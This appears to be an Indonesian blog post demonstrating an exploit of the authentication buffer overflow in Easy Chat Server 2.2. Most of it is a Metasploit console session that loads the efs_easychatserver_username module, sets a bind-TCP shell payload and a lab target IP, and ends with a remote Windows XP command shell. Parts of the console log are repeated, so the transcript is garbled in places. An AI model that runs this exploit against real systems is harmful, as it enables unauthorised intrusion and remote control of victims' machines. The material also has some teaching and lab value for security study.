Disini penulis mencoba melakukan exploitasi pada Easy Chat Server versi 2.2 yang memiliki masalah pada authentication request handling buffer overflow, karena sudah dijelaskan apa itu buffer overfow di artikel sebelumnya, maka kita dapat langsung praktek saja.
IP Target adalah 192.168.1.25. berikut exploitasinya :
, ,
/ \
((__—,,,—__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
/ \
((__—,,,—__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13646 updated yesterday (2011.08.27)
+ — –=[ 731 exploits - 372 auxiliary - 80 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13646 updated yesterday (2011.08.27)
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
msf > use exploit/windows/http/efs_easychatserver_username
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.25
msf exploit(efs_easychatserver_username) > exploit
PAYLOAD => windows/shell/bind_tcp
RHOST => 192.168.1.25
[*] Started bind handler
[*] path: C:\Program Files\Easy Chat Server\users\
[*] Trying target Easy Chat Server 2.2…
[*] Sending stage (240 bytes) to 192.168.1.25
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
msf > use exploit/windows/http/efs_easychatserver_username
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.25
msf exploit(efs_easychatserver_username) > exploit
PAYLOAD => windows/shell/bind_tcp
RHOST => 192.168.1.25
[*] Started bind handler
[*] path: C:\Program Files\Easy Chat Server\users\
[*] Trying target Easy Chat Server 2.2…
[*] Sending stage (240 bytes) to 192.168.1.25
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Easy Chat Server>
Binggo, kita mendapatkan shell.
0 komentar:
Posting Komentar